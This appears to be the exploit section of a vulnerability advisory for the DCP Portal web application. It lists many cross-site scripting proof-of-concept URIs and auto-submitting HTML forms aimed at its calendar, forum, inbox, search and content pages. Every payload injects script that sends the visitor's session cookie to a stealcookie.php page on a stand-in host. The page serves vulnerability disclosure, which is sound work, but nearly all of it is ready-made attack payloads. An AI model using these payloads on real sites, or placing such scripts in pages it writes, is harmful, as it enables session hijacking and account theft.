• info
• discussion
• exploit
• solution
• references

DCP Portal Multiple Cross-Site Scripting Vulnerabilities

This issue can be exploited through use of a web client.

The following proof-of-concept URIs are available:
http://www.example.com/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html"><script type="text/javascript">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/index.php?page=send_write&url=xyz.html"><script type="text/javascript">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/calendar.php?subject_color="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/calendar.php?images="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/calendar.php?day=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<form action='http://www.example.com/dcp-portal611/calendar.php?show=full_month&month=02&day="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="text" name="year" value='2006' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/calendar.php?year=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<form action='http://www.example.com/dcp-portal611/forums.php?action=board&bid=1' method="post">
<input type="text" name="bid" value='"></a><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/forums.php?action=board&bid="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1&replying_msg=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<form action='http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="subject" value='"><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="body" value='"></textarea><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/forums.php?action=addtopic&bid=1&mid="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<form action='http://www.example.com/dcp-portal611/forums.php?action=savemsg' method="post">
<input type="text" name="bid" value='"><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="subject" value='"><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="text" name="message" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="message" value='"></textarea><script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script>' />
<input type="text" name="subject" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/inbox.php?action=delete&subject="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/inbox.php?action=delete&message="></textarea><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/dcp-portal611/lostpassword.php?subject_color="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/lostpassword.php?email="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=content&content_inicial=</textarea><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=addnews&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=addnews&content_inicial=</textarea><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=addnews&mode=write&dcp_editor_contingut_html=xyz&c_name=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>&c_image_name=
http://www.example.com/dcp-portal611/mycontents.php?action=addanns&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=updatecontent&cid="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>
http://www.example.com/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>

<form action='http://www.example.com/dcp-portal611/search.php?field=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>' method="post">
<input type="text" name="q" value="xyz"/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action='http://www.example.com/dcp-portal611/search.php' method="post">
<input type="text" name="q" value='<script>document.location="http://www.example.com/stealcookie.php?"+document.cookie</script> method="post">'/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>